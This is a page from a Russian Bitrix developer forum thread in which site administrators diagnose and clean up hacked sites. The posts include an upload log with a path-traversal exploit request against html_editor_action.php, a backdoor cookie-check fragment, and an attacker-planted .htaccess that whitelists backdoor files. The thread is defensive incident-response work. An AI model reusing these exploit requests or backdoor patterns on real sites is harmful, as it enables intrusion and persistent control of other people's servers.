Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 515353

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 04.03.2016

#326

09.01.2023 14:03:50

На это указывает лог залития на сайт бэкдора в виде файла spread.php по адресу bitrix/tools/spread.php:

Код

a:5:{s:5:"files";a:1:{s:10:"spread.php";a:9:{s:4:"name";N;s:5:"~name";s:10:"spread.php";s:8:"tmp_name";s:149:"/***/public_html/upload/tmp/BXTEMP-2023-01-01/11/bxu/fe19530bfc07335d73f48bdac5c1746b/. ./. ./. ./. ./. ./. ./bitrix/tools//spread.php";s:4:"type";s:10:"text/x-php";s:4:"size";i:545;s:5:"error";i:0;s:4:"copy";s:10:"spread.php";s:3:"url";s:164:"https://***.ru/bitrix/tools/html_editor_action.php?bxu_info[CID]=x&bxu_info[mode]=view&bxu_info[hash]=..%2F..%2F..%2F..%2F..%2F..%2Fbitrix%2Ftools%2F_spread.php";s:13:"sizeFormatted";s:6:"545 Б";}}s:6:"status";s:10:"inprogress";s:4:"hash";s:31:"../. ./. ./. ./. ./. ./bitrix/tools/";s:2:"id";s:31:"../. ./. ./. ./. ./. ./bitrix/tools/";s:7:"~status";s:10:"inprogress";}

Создание и поддержка сайтов: https://evgenydonich.ru

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#327

09.01.2023 14:11:16

вот я про это и говорю, на сколько я понимаю /upload/tmp/ не есть директория для временного хранения файлов в понятиях PHP
но используется Битриксом как директория для временного хранения файлов (но уже на каком то своём уровне)
сомневаюсь, что её можно вытащить за пределы сайта

хотя могу ошибаться ...

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011 Сертифицированный партнер	#328 09.01.2023 14:12:43 Евгений Донич, а у пользователя стояли последние обновления движка? вроде уязвимость в html_editor_action.php уже давно прикрыли Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#329

25.01.2023 11:31:59

коллеги, кто нибудь в курсе как зараза пролезает которая меняет
/bitrix/modules/main/bx_root.php

вот такой ужас там обнаружил
http://gtalex.ru/files/bx_root.txt

кто-то как у себя дома "хозяйничает" причём даже закоментированный код оставили зачем то

у клиента денег на обновление движка до актуальной версии нет

а дыру заделать очень просил

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 219590 Заглянувший Сообщений: 2 Регистрация: 30.11.2013	#330 01.02.2023 15:13:09 Спасибо всем большое за оперативность. Помогло!

Пользователь 1782079

Заглянувший

Сообщений: 1 Регистрация: 27.01.2023

#331

03.02.2023 13:01:53

при загрузке 13 и 12 страницы (другие не пробовал) этой темы на форуме Каспер ругается на вирус :
03.02.2023 12:50:17;Обнаружен вредоносный объект; HEUR:Trojan.Script.Generic; Троянское приложение; Эвристический анализ;
https://dev.1c-bitrix.ru/support/forum/forum6/topic147346/?PAGEN_1=12;?PAGEN_1=12;https://dev.1c-bit... анализ
Если вируса на странице нет, то возможно в JS прописан "request.open('GET', URL_BASE+'/data.json', true);"
Как исправить - указано здесь https://habr.com/ru/post/254437/

Пользователь 7015034

Заглянувший

Сообщений: 7 Регистрация: 07.02.2023

#332

07.02.2023 12:27:46

Приветствую всех!
Такая проблема: примерно с числа 02.022023г. не могу войти в админ панель, т.е. пароль и логи ввожу корректно, страница обновляется и все пусто.
Естественно чистил кэш, пробовал разные браузеры.
При этом заметил, что очень много спама пришло на форму отзывов.
Может произошло переполнение какое-то где храняться список отзывов (имхо).
скриншот

Пользователь 7015034

Заглянувший

Сообщений: 7 Регистрация: 07.02.2023

#333

07.02.2023 12:31:29

Цитата
написал: 2017-05-10 10:48:20.0000000000 ./bitrix/modules/main/include/prolog_after.php2017-05-10 10:48:18.0000000000 ./bitrix/modules/main/bx_root.php1970-01-01 03:00:00.0000000000 ./bitrix/templates/vote/default

Привильно ли понял, что нужно найти такие файлы:

2017-05-10 10:48:20.0000000000 ./bitrix/modules/main/include/prolog_after.php2017-05-10 10:48:18.0000000000 ./bitrix/modules/main/bx_root.php
1970-01-01 03:00:00.0000000000 ./bitrix/templates/vote/default

и удалить в них код указанный?

Пользователь 1329903

Эксперт

Сообщений: 303 Баллов: 70 Регистрация: 15.08.2017

#334

07.02.2023 12:36:07

Цитата
ivans23 написал: Привильно ли понял, что нужно найти такие файлы: и удалить в них код указанный?

Верно, но искать лучше все изменённые файлы за последние дни, код может быть прописан и в других файлах.

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#335

07.02.2023 12:41:39

Цитата

ivans23 написал:
Приветствую всех!
Такая проблема: примерно с числа 02.022023г. не могу войти в админ панель, т.е. пароль и логи ввожу корректно, страница обновляется и все пусто.
Естественно чистил кэш, пробовал разные браузеры.
При этом заметил, что очень много спама пришло на форму отзывов.
Может произошло переполнение какое-то где храняться список отзывов (имхо).
скриншот

было такое - решение точно не скажу, но оно в этой теме точно есть ... я выкладывал что нужно сделать и ссылки на статьи источники, может 2-4 страницы тому назад
на сколько помню JS иньекцию нужно вычистить

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7015034 Заглянувший Сообщений: 7 Регистрация: 07.02.2023	#336 07.02.2023 13:58:11 файла "main.php" нет по пути /bitrix/components/bitrix/main.file.input/ в "prolog.php" нет ссылок в "agent_list.php" все норм вроде

Пользователь 44943

Постоянный посетитель

Сообщений: 138 Баллов: 22 Регистрация: 03.07.2009

#337

17.02.2023 11:51:29

Цитата

написал:

Цитата
ivans23 написал: Привильно ли понял, что нужно найти такие файлы: и удалить в них код указанный?

Верно, но искать лучше все изменённые файлы за последние дни, код может быть прописан и в других файлах.

У меня на этих файлах код присутствует, но по дате как-будто не менялись. Дата изменения от 17 года еще стоит.

Пользователь 1329903

Эксперт

Сообщений: 303 Баллов: 70 Регистрация: 15.08.2017

#338

17.02.2023 11:54:56

Цитата
Евгений Власов написал: но по дате как-будто не менялись.

Смотреть нужно ctime, а не mtime. Прямо на этой странице об этом написано.

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011 Сертифицированный партнер	#339 17.02.2023 12:19:17 смотреть даты изменения - это только если взломщик не позаботился о том, чтобы их обратно изменить врят ли на это стоит рассчитывать Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#340

20.02.2023 15:30:52

сегодня обратились за помощью - вообще жестокий взлом, сайт положили - тупо .htaccess переписали поверх

Цитата
<FilesMatch '.(py\|exe\|phtml\|php\|PHP\|Php\|PHp\|pHp\|pHP\|pHP7\|PHP7\|phP\|PhP\|php5\|suspected)$'> Order allow,deny Deny from all </FilesMatch>

будем логи изучать, через что залезли

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 89725

Постоянный посетитель

Сообщений: 63 Баллов: 11 Регистрация: 29.04.2011

#341

20.02.2023 16:14:09

Цитата
написал: будем логи изучать, через что залезли

кроме htaccess (которые появились во всех папках по экземпляру) в /bitrix/admin/ периодически создаются рандомные php с таким фрагментом бекдора

Цитата
....if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec").....

Решения Плюс

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011 Сертифицированный партнер	#342 20.02.2023 16:22:03 как ломанули нашел, но к сожалению заказчик уже сам этот файл почистил очень жаль ... так не найду откуда изначально дыра открыта Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 89725

Постоянный посетитель

Сообщений: 63 Баллов: 11 Регистрация: 29.04.2011

#343

20.02.2023 16:26:04

Цитата
написал: как ломанули нашел, но к сожалению заказчик уже сам этот файл почистил

можно в личку ? я пока не нашел)

Решения Плюс

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011 Сертифицированный партнер	#344 20.02.2023 16:32:31 был POST /bitrix/admin/inputs.php но вот самого inputs.php уже нет Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 44943

Постоянный посетитель

Сообщений: 138 Баллов: 22 Регистрация: 03.07.2009

#345

21.02.2023 00:21:49

Цитата
написал: смотреть даты изменения - это только если взломщик не позаботился о том, чтобы их обратно изменить врят ли на это стоит рассчитывать

Я через winscp смотрел.

Пользователь 44943

Постоянный посетитель

Сообщений: 138 Баллов: 22 Регистрация: 03.07.2009

#346

21.02.2023 00:56:29

Появилась другая проблема. Теперь файлы php отдают все 403 ответ.

htaccess в корне был заменен вот на это.

Код

<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

Я вернул на старый htaccess. Но не помогло. Создал файл в корне test.php просто с текстом echo 'test' попытался открыть его по адресу site.ru/test.php тот же ответ 403. Такое впечатление, что где-то в сервере в настройках php еще что-то меняли. У меня сейчас к ним доступа нет. Еще создался опять бекдор inputs.php, только теперь в корне (до этого в bitrix/admin/ создавался).

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#347

21.02.2023 03:31:16

Врят ли в настройках, там рутовый доступ нужен, сломали скорее всего через старое ядро Битрикса.
Обновления в Битриксе были установлены?

Покажи .htaccess с корня

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 89725

Постоянный посетитель

Сообщений: 63 Баллов: 11 Регистрация: 29.04.2011

#348

21.02.2023 04:24:15

В общем ломанули как написал выше red_eye через vote, в нашем случае создавались постоянно бекдоры в /bitrix/admin/ с именами af640d8ff97f.php c5d0ffc28f12.php d3bcae31ffdb.php , по причине модификации модуля main появились 2 пустых строки в обмене с 1с, и обмен штатный отваливался.

Решения Плюс

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#349

21.02.2023 04:30:16

У последнего клиента vote отсутствовал, так что хз как ломанули

Причем лом какой то странный, не пойму зачем htaccess так портить
И судя по его содержимому там и на wordpress какой то расчет...
Уже начинаю сомневаться, что это через ядро Битрикса взломали.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 89725 Постоянный посетитель Сообщений: 63 Баллов: 11 Регистрация: 29.04.2011	#350 21.02.2023 04:43:29 у нашего сначала ломанули, а атака с распространением htaccess спустя неделю прошла уже через бекдоры Решения Плюс

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером